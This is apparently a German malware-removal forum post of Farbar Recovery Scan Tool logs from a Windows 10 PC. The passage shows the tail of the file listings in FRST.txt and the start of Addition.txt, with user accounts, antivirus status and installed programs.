2020-09-12 17:25 - 2020-09-12 17:25 - 000400696 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\clfs.sys
2020-09-12 17:25 - 2020-09-12 17:25 - 000392704 _____ (Microsoft Corporation) C:\Windows\system32\dhcpcore.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000392192 _____ (Microsoft Corporation) C:\Windows\system32\Search.ProtocolHandler.MAPI2.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000382464 _____ (Microsoft Corporation) C:\Windows\system32\AppLockerCSP.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000379904 _____ (Microsoft Corporation) C:\Windows\system32\provengine.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000375096 _____ (Microsoft Corporation) C:\Windows\system32\thumbcache.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000372536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\msrpc.sys
2020-09-12 17:25 - 2020-09-12 17:25 - 000368128 _____ (Microsoft Corporation) C:\Windows\system32\mssvp.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000365056 _____ (Microsoft Corporation) C:\Windows\system32\credprovs.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000363128 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000356160 _____ (Microsoft Corporation) C:\Windows\system32\SecurityHealthAgent.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000353792 _____ (Microsoft Corporation) C:\Windows\system32\dnsrslvr.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000332800 _____ (Microsoft Corporation) C:\Windows\system32\omadmclient.exe
2020-09-12 17:25 - 2020-09-12 17:25 - 000324408 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000315904 _____ (Microsoft Corporation) C:\Windows\system32\dmenterprisediagnostics.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000312832 _____ (Microsoft Corporation) C:\Windows\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000308736 _____ (Microsoft Corporation) C:\Windows\system32\msIso.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000294400 _____ (Microsoft Corporation) C:\Windows\system32\provops.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000293376 _____ (Microsoft Corporation) C:\Windows\system32\dhcpcore6.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000291840 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ahcache.sys
2020-09-12 17:25 - 2020-09-12 17:25 - 000279552 _____ (Microsoft Corporation) C:\Windows\system32\storewuauth.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000279552 _____ (Microsoft Corporation) C:\Windows\system32\smbwmiv2.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000278016 _____ (Microsoft Corporation) C:\Windows\system32\pdh.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000273208 _____ (Microsoft Corporation) C:\Windows\system32\CloudExperienceHostUser.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000271872 _____ (Microsoft Corporation) C:\Windows\system32\provhandlers.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000265216 _____ (Microsoft Corporation) C:\Windows\system32\cdd.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000260408 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2020-09-12 17:25 - 2020-09-12 17:25 - 000259072 _____ (Microsoft Corporation) C:\Windows\system32\VPNv2CSP.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000256000 _____ (Microsoft Corporation) C:\Windows\system32\UpdateDeploymentProvider.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000255488 _____ (Microsoft Corporation) C:\Windows\system32\wpnservice.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000254776 _____ (Microsoft Corporation) C:\Windows\system32\offlinesam.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000253952 _____ (Microsoft Corporation) C:\Windows\system32\BitLockerCsp.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000250680 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tpm.sys
2020-09-12 17:25 - 2020-09-12 17:25 - 000240640 _____ (Microsoft Corporation) C:\Windows\system32\SearchFilterHost.exe
2020-09-12 17:25 - 2020-09-12 17:25 - 000233472 _____ (Microsoft Corporation) C:\Windows\system32\KnobsCore.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000232960 _____ (Microsoft Corporation) C:\Windows\system32\provisioningcsp.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000231936 _____ (Microsoft Corporation) C:\Windows\system32\InstallServiceTasks.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000224768 _____ (Microsoft Corporation) C:\Windows\system32\TabSvc.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000224072 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\intelppm.sys
2020-09-12 17:25 - 2020-09-12 17:25 - 000213824 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000209920 _____ (Microsoft Corporation) C:\Windows\system32\wuuhosdeployment.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000209216 _____ (Microsoft Corporation) C:\Windows\system32\Windows.StateRepositoryClient.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000208712 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\processr.sys
2020-09-12 17:25 - 2020-09-12 17:25 - 000208384 _____ (Microsoft Corporation) C:\Windows\system32\Windows.StateRepositoryUpgrade.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000205640 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2020-09-12 17:25 - 2020-09-12 17:25 - 000204800 _____ (Microsoft Corporation) C:\Windows\system32\mssph.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000201728 _____ (Microsoft Corporation) C:\Windows\system32\AppXApplicabilityBlob.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000201544 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\amdppm.sys
2020-09-12 17:25 - 2020-09-12 17:25 - 000200704 _____ (Microsoft Corporation) C:\Windows\system32\updatepolicy.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000200008 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\amdk8.sys
2020-09-12 17:25 - 2020-09-12 17:25 - 000197632 _____ (Microsoft Corporation) C:\Windows\system32\Win32CompatibilityAppraiserCSP.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000179512 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2020-09-12 17:25 - 2020-09-12 17:25 - 000160256 _____ (Microsoft Corporation) C:\Windows\system32\appinfo.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000159232 _____ (Microsoft Corporation) C:\Windows\system32\srpapi.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000158720 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2020-09-12 17:25 - 2020-09-12 17:25 - 000150528 _____ (Microsoft Corporation) C:\Windows\system32\mapistub.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000150528 _____ (Microsoft Corporation) C:\Windows\system32\mapi32.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000147456 _____ (Microsoft Corporation) C:\Windows\system32\mssprxy.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000146248 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2020-09-12 17:25 - 2020-09-12 17:25 - 000142152 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\stornvme.sys
2020-09-12 17:25 - 2020-09-12 17:25 - 000132408 _____ (Microsoft Corporation) C:\Windows\system32\offlinelsa.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000131896 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mup.sys
2020-09-12 17:25 - 2020-09-12 17:25 - 000129536 _____ (Microsoft Corporation) C:\Windows\system32\UtcDecoderHost.exe
2020-09-12 17:25 - 2020-09-12 17:25 - 000128512 _____ (Microsoft Corporation) C:\Windows\system32\mssitlb.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000127064 _____ (Microsoft Corporation) C:\Windows\system32\win32u.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000125952 _____ (Microsoft Corporation) C:\Windows\system32\fontsub.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000123392 _____ (Microsoft Corporation) C:\Windows\system32\cryptcatsvc.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000122368 _____ (Microsoft Corporation) C:\Windows\system32\samlib.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000121856 _____ (Microsoft Corporation) C:\Windows\system32\UserDataTimeUtil.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000121856 _____ (Microsoft Corporation) C:\Windows\system32\updatecsp.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000120320 _____ (Microsoft Corporation) C:\Windows\system32\KnobsCsp.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000108856 _____ (Microsoft Corporation) C:\Windows\system32\SecurityHealthProxyStub.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000108032 _____ (Microsoft Corporation) C:\Windows\system32\wwanprotdim.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000105984 _____ (Microsoft Corporation) C:\Windows\system32\utcutil.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000104248 _____ (Microsoft Corporation) C:\Windows\system32\Windows.StateRepositoryBroker.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000102912 _____ (Microsoft Corporation) C:\Windows\system32\NFCProvisioningPlugin.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000102912 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000097792 _____ (Microsoft Corporation) C:\Windows\system32\provdatastore.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000092672 _____ (Microsoft Corporation) C:\Windows\system32\dhcpcsvc.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000091136 _____ (Microsoft Corporation) C:\Windows\system32\ProvPluginEng.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000089088 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000089088 _____ (Microsoft Corporation) C:\Windows\system32\BarcodeProvisioningPlugin.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000084480 _____ (Microsoft Corporation) C:\Windows\system32\provtool.exe
2020-09-12 17:25 - 2020-09-12 17:25 - 000079576 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000077824 _____ (Microsoft Corporation) C:\Windows\system32\CustomInstallExec.exe
2020-09-12 17:25 - 2020-09-12 17:25 - 000068096 _____ (Microsoft Corporation) C:\Windows\system32\dhcpcsvc6.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000066872 _____ (Microsoft Corporation) C:\Windows\system32\CloudExperienceHostBroker.exe
2020-09-12 17:25 - 2020-09-12 17:25 - 000066560 _____ (Microsoft Corporation) C:\Windows\system32\RemovableMediaProvisioningPlugin.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000065024 _____ (Microsoft Corporation) C:\Windows\system32\rtutils.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000064000 _____ (Microsoft Corporation) C:\Windows\system32\tbauth.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000063296 _____ (Microsoft Corporation) C:\Windows\system32\SecurityHealthHost.exe
2020-09-12 17:25 - 2020-09-12 17:25 - 000061952 _____ (Microsoft Corporation) C:\Windows\system32\mf3216.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000061952 _____ (Microsoft Corporation) C:\Windows\system32\edpnotify.exe
2020-09-12 17:25 - 2020-09-12 17:25 - 000060416 _____ (Microsoft Corporation) C:\Windows\system32\msscntrs.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000059392 _____ C:\Windows\system32\runexehelper.exe
2020-09-12 17:25 - 2020-09-12 17:25 - 000059192 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\storufs.sys
2020-09-12 17:25 - 2020-09-12 17:25 - 000057888 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2020-09-12 17:25 - 2020-09-12 17:25 - 000057856 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000052736 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000047104 _____ (Microsoft Corporation) C:\Windows\system32\perfctrs.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000047008 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2020-09-12 17:25 - 2020-09-12 17:25 - 000045568 _____ (Microsoft Corporation) C:\Windows\system32\Windows.StateRepositoryCore.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000045568 _____ (Microsoft Corporation) C:\Windows\system32\cmintegrator.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000045056 _____ (Microsoft Corporation) C:\Windows\system32\perfproc.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000041472 _____ (Microsoft Corporation) C:\Windows\system32\perfdisk.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000040960 _____ (Microsoft Corporation) C:\Windows\system32\perfos.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000036864 _____ (Microsoft Corporation) C:\Windows\system32\TokenBrokerCookies.exe
2020-09-12 17:25 - 2020-09-12 17:25 - 000036352 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\BtaMPM.sys
2020-09-12 17:25 - 2020-09-12 17:25 - 000033792 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Management.Provisioning.ProxyStub.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000031232 _____ (Microsoft Corporation) C:\Windows\system32\FaxPrinterInstaller.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000030720 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\KNetPwrDepBroker.sys
2020-09-12 17:25 - 2020-09-12 17:25 - 000029184 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000028672 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ndistapi.sys
2020-09-12 17:25 - 2020-09-12 17:25 - 000026624 _____ (Microsoft Corporation) C:\Windows\system32\perfnet.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000025600 _____ (Microsoft Corporation) C:\Windows\system32\appidtel.exe
2020-09-12 17:25 - 2020-09-12 17:25 - 000021504 _____ (Microsoft Corporation) C:\Windows\system32\provdiagnostics.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000021504 _____ (Microsoft Corporation) C:\Windows\system32\fixmapi.exe
2020-09-12 17:25 - 2020-09-12 17:25 - 000019456 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2020-09-12 17:25 - 2020-09-12 17:25 - 000018432 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\applockerfltr.sys
2020-09-12 17:25 - 2020-09-12 17:25 - 000015872 _____ (Microsoft Corporation) C:\Windows\system32\KBDJPN.DLL
2020-09-12 17:25 - 2020-09-12 17:25 - 000014336 _____ (Microsoft Corporation) C:\Windows\system32\dciman32.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000008704 _____ (Microsoft Corporation) C:\Windows\system32\kbd106.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000008192 _____ (Microsoft Corporation) C:\Windows\system32\msimg32.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000008192 _____ (Microsoft Corporation) C:\Windows\system32\kbd106n.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000008192 _____ (Microsoft Corporation) C:\Windows\system32\kbd101.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000003072 _____ (Microsoft Corporation) C:\Windows\system32\lpk.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000002560 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000002560 _____ (Microsoft Corporation) C:\Windows\system32\tier2punctuations.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000002560 _____ (Microsoft Corporation) C:\Windows\system32\msxml6r.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000002560 _____ (Microsoft Corporation) C:\Windows\system32\msxml3r.dll
2020-09-12 17:21 - 2020-08-15 07:25 - 000492544 _____ (Microsoft Corporation) C:\Windows\system32\poqexec.exe
2020-09-12 17:21 - 2020-08-15 07:15 - 000390656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\poqexec.exe

==================== Ein Monat (geänderte) ==================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2020-10-06 11:02 - 2020-05-15 23:59 - 000000000 ____D C:\Users\samim\AppData\Local\CrashDumps
2020-10-06 11:02 - 2020-05-15 13:43 - 000000000 ____D C:\Users\samim\AppData\Roaming\discord
2020-10-06 11:02 - 2020-05-15 13:31 - 000000000 ____D C:\Users\samim\AppData\Roaming\WhatsApp
2020-10-06 11:02 - 2019-10-17 06:06 - 000000000 ____D C:\Windows\system32\SleepStudy
2020-10-06 11:02 - 2019-03-19 06:52 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2020-10-06 10:40 - 2020-04-03 11:35 - 000746614 _____ C:\Windows\system32\perfh007.dat
2020-10-06 10:40 - 2020-04-03 11:35 - 000150886 _____ C:\Windows\system32\perfc007.dat
2020-10-06 10:40 - 2020-04-03 01:45 - 001723292 _____ C:\Windows\system32\PerfStringBackup.INI
2020-10-06 10:40 - 2019-03-19 06:50 - 000000000 ____D C:\Windows\INF
2020-10-06 10:36 - 2020-04-03 01:54 - 000000000 ____D C:\ProgramData\NVIDIA
2020-10-06 10:34 - 2020-05-15 20:23 - 000000000 ____D C:\Program Files (x86)\Steam
2020-10-06 10:34 - 2020-05-15 13:07 - 000000000 ____D C:\Users\samim\AppData\LocalLow\Mozilla
2020-10-06 10:34 - 2020-05-15 12:25 - 000000000 ___RD C:\Users\samim\OneDrive
2020-10-06 10:34 - 2020-04-03 01:53 - 000000134 _____ C:\Windows\system32\regtest.txt
2020-10-06 10:34 - 2019-10-17 06:07 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2020-10-06 02:10 - 2020-05-16 21:38 - 000000000 ____D C:\Program Files (x86)\Samsung
2020-10-06 02:10 - 2020-05-15 12:28 - 000000000 ____D C:\Users\samim\AppData\Local\Lenovo
2020-10-06 02:10 - 2020-05-15 12:23 - 000000000 ____D C:\Windows\Lenovo
2020-10-06 02:10 - 2020-04-03 01:41 - 000000000 ____D C:\Windows\system32\Tasks\Lenovo
2020-10-06 02:10 - 2020-04-03 01:41 - 000000000 ____D C:\ProgramData\Lenovo
2020-10-06 02:10 - 2019-03-19 06:37 - 000786432 _____ C:\Windows\system32\config\BBI
2020-10-05 23:06 - 2020-04-03 01:49 - 000000000 ____D C:\ProgramData\Package Cache
2020-10-05 17:36 - 2020-07-18 15:20 - 000000000 ____D C:\Users\samim\AppData\LocalLow\Temp
2020-10-04 21:13 - 2019-03-19 06:52 - 000000000 ___HD C:\Program Files\WindowsApps
2020-10-04 21:13 - 2019-03-19 06:52 - 000000000 ____D C:\Windows\AppReadiness
2020-10-04 12:23 - 2020-05-15 13:03 - 000003700 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2020-10-04 12:23 - 2020-05-15 13:03 - 000003576 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2020-10-04 12:04 - 2019-10-17 06:06 - 000441864 _____ C:\Windows\system32\FNTCACHE.DAT
2020-10-03 21:17 - 2020-05-15 13:08 - 000000000 ____D C:\Program Files (x86)\Google
2020-10-03 21:11 - 2019-03-19 06:52 - 000000000 ___HD C:\Windows\ELAMBKUP
2020-10-03 21:06 - 2020-05-15 13:14 - 000000000 ____D C:\ProgramData\Avira
2020-10-03 10:24 - 2020-05-15 13:04 - 000002430 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2020-10-03 10:24 - 2020-05-15 13:04 - 000002268 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk
2020-10-03 10:24 - 2020-05-15 13:04 - 000002268 _____ C:\ProgramData\Desktop\Microsoft Edge.lnk
2020-10-02 20:59 - 2020-05-15 13:07 - 000001016 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2020-10-02 20:59 - 2020-05-15 13:07 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2020-10-02 19:32 - 2020-08-21 20:58 - 000000000 ____D C:\Program Files\Microsoft Update Health Tools
2020-10-01 22:23 - 2020-05-15 14:23 - 000000000 ____D C:\Users\samim\AppData\Local\babl-0.1
2020-10-01 22:02 - 2020-05-18 22:08 - 000000000 ____D C:\Users\samim\AppData\Local\gtk-2.0
2020-10-01 20:07 - 2020-05-15 13:17 - 000000000 ____D C:\Users\Public\Security Sessions
2020-10-01 20:00 - 2020-05-15 13:07 - 000000000 ____D C:\ProgramData\Mozilla
2020-09-30 18:49 - 2020-09-02 13:42 - 000000000 ____D C:\Users\samim\AppData\Roaming\Racket
2020-09-26 18:47 - 2020-06-06 21:00 - 000000000 ____D C:\Users\samim\OneDrive\Dokumente\My Games
2020-09-25 19:25 - 2020-05-15 13:31 - 000000000 ____D C:\Users\samim\AppData\Local\WhatsApp
2020-09-25 19:25 - 2020-05-15 13:31 - 000000000 ____D C:\Users\samim\AppData\Local\SquirrelTemp
2020-09-15 21:39 - 2020-05-15 13:25 - 000000000 ____D C:\Users\samim\AppData\Local\Spotify
2020-09-15 21:13 - 2020-05-15 13:24 - 000000000 ____D C:\Users\samim\AppData\Roaming\Spotify
2020-09-15 20:23 - 2020-04-03 01:45 - 000002462 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Word.lnk
2020-09-15 20:23 - 2020-04-03 01:45 - 000002461 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PowerPoint.lnk
2020-09-15 20:23 - 2020-04-03 01:45 - 000002425 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Access.lnk
2020-09-15 20:23 - 2020-04-03 01:45 - 000002424 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Excel.lnk
2020-09-15 20:23 - 2020-04-03 01:45 - 000002418 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Outlook.lnk
2020-09-15 20:23 - 2020-04-03 01:45 - 000002412 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Publisher.lnk
2020-09-15 20:23 - 2020-04-03 01:45 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools
2020-09-15 20:23 - 2020-04-03 01:43 - 000000000 ____D C:\Program Files\Microsoft Office
2020-09-14 21:00 - 2020-05-15 12:24 - 000000000 ____D C:\Users\samim\AppData\Local\PlaceholderTileLogoFolder
2020-09-14 18:18 - 2020-05-15 12:23 - 000000000 ____D C:\Users\samim\AppData\Local\Packages
2020-09-14 18:16 - 2020-05-15 12:23 - 000000000 ___RD C:\Users\samim\3D Objects
2020-09-14 18:16 - 2019-10-17 06:10 - 000000000 __RHD C:\Users\Public\AccountPictures
2020-09-13 22:57 - 2019-03-19 06:52 - 000000000 ___SD C:\Windows\system32\DiagSvcs
2020-09-13 22:57 - 2019-03-19 06:52 - 000000000 ___RD C:\Windows\PrintDialog
2020-09-13 22:57 - 2019-03-19 06:52 - 000000000 ___RD C:\Windows\ImmersiveControlPanel
2020-09-13 22:57 - 2019-03-19 06:52 - 000000000 ____D C:\Windows\SystemResources
2020-09-13 22:57 - 2019-03-19 06:52 - 000000000 ____D C:\Windows\system32\oobe
2020-09-13 22:57 - 2019-03-19 06:52 - 000000000 ____D C:\Windows\system32\migwiz
2020-09-13 22:57 - 2019-03-19 06:52 - 000000000 ____D C:\Windows\ShellExperiences
2020-09-13 22:57 - 2019-03-19 06:52 - 000000000 ____D C:\Windows\Provisioning
2020-09-13 22:57 - 2019-03-19 06:52 - 000000000 ____D C:\Windows\bcastdvr
2020-09-12 17:32 - 2020-05-16 00:38 - 000000000 ____D C:\Windows\system32\MRT
2020-09-12 17:28 - 2020-05-16 00:38 - 129170736 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2020-09-12 17:28 - 2019-03-19 06:37 - 000000000 ____D C:\Windows\CbsTemp
2020-09-12 17:25 - 2019-10-17 06:09 - 002876416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PrintConfig.dll
2020-09-11 22:27 - 2020-06-26 17:57 - 000000000 ____D C:\Users\samim\AppData\Local\.IdentityService
2020-09-10 22:05 - 2020-05-15 13:43 - 000000000 ____D C:\Users\samim\AppData\Local\Discord
2020-09-10 18:14 - 2020-08-21 20:58 - 000905528 _____ (Microsoft Corporation) C:\Windows\system32\sedplugins.dll
2020-09-10 18:14 - 2020-08-21 20:58 - 000436536 _____ (Microsoft Corporation) C:\Windows\system32\QualityUpdateAssistant.dll
2020-09-09 18:33 - 2020-05-15 12:25 - 000003378 _____ C:\Windows\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-392041295-3890174389-3109141049-1001
2020-09-09 18:33 - 2020-05-15 12:13 - 000002390 _____ C:\Users\samim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse ========

2020-06-15 22:42 - 2020-06-15 22:46 - 000004593 _____ () C:\Users\samim\AppData\Roaming\VoiceMeeterDefault.xml
2020-06-18 22:17 - 2020-06-18 22:17 - 000000353 _____ () C:\Users\samim\AppData\Local\karboncalligraphyrc
2020-06-18 21:44 - 2020-06-18 22:54 - 000002558 _____ () C:\Users\samim\AppData\Local\krita-sysinfo.log
2020-06-18 21:44 - 2020-06-19 00:45 - 000006472 _____ () C:\Users\samim\AppData\Local\krita.log
2020-06-19 00:45 - 2020-06-19 00:45 - 000000039 _____ () C:\Users\samim\AppData\Local\kritadisplayrc
2020-06-18 21:44 - 2020-06-19 00:45 - 000017690 _____ () C:\Users\samim\AppData\Local\kritarc
2020-10-01 22:23 - 2020-10-01 22:23 - 000066883 _____ () C:\Users\samim\AppData\Local\recently-used.xbel
2020-05-16 13:36 - 2020-05-16 13:36 - 000000017 _____ () C:\Users\samim\AppData\Local\resmon.resmoncfg

==================== SigCheck ============================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

==================== Ende von FRST.txt ========================


Samoxx 06.10.2020 10:10

Hier addition.txt:
Code:

Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 04-10-2020
durchgeführt von samim (06-10-2020 11:04:20)
Gestartet von C:\Users\samim\Downloads
Windows 10 Home Version 1909 18363.1082 (X64) (2020-05-15 16:02:54)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-392041295-3890174389-3109141049-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-392041295-3890174389-3109141049-503 - Limited - Disabled)
Gast (S-1-5-21-392041295-3890174389-3109141049-501 - Limited - Disabled)
samim (S-1-5-21-392041295-3890174389-3109141049-1001 - Administrator - Enabled) => C:\Users\samim
WDAGUtilityAccount (S-1-5-21-392041295-3890174389-3109141049-504 - Limited - Disabled)

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

Application Verifier x64 External Package (HKLM\...\{10CA1677-8F02-3131-F25C-780BAB52E468}) (Version: 10.1.18362.1 - Microsoft) Hidden
Application Verifier x64 External Package (HKLM\...\{634A88E5-3478-F27D-6260-C9B62848D7AA}) (Version: 10.1.19041.1 - Microsoft) Hidden
Blender (HKLM\...\{0294B421-9B23-49AE-917C-B62EF6D42E8B}) (Version: 2.83.1 - Blender Foundation)
Common Desktop Agent (HKLM\...\{031A0E14-0413-4C97-9772-2639B782F46F}) (Version: 1.62.0 - OEM) Hidden
DiagnosticsHub_CollectionService (HKLM\...\{1F3C3AAC-9F7A-47DA-A082-0ACE770041BE}) (Version: 16.1.28901 - Microsoft Corporation) Hidden
Discord (HKU\S-1-5-21-392041295-3890174389-3109141049-1001\...\Discord) (Version: 0.0.308 - Discord Inc.)
Epic Games Launcher (HKLM-x32\...\{A5A6A747-393C-4B28-AB7B-2DE2BA7F7D73}) (Version: 1.1.267.0 - Epic Games, Inc.)
Epic Games Launcher Prerequisites (x64) (HKLM\...\{F9C5C994-F6B9-4D75-B3E7-AD01B84073E9}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
f.lux (HKU\S-1-5-21-392041295-3890174389-3109141049-1001\...\Flux) (Version:  - f.lux Software LLC)
GIMP 2.10.20 (HKLM\...\GIMP-2_is1) (Version: 2.10.20 - The GIMP Team)
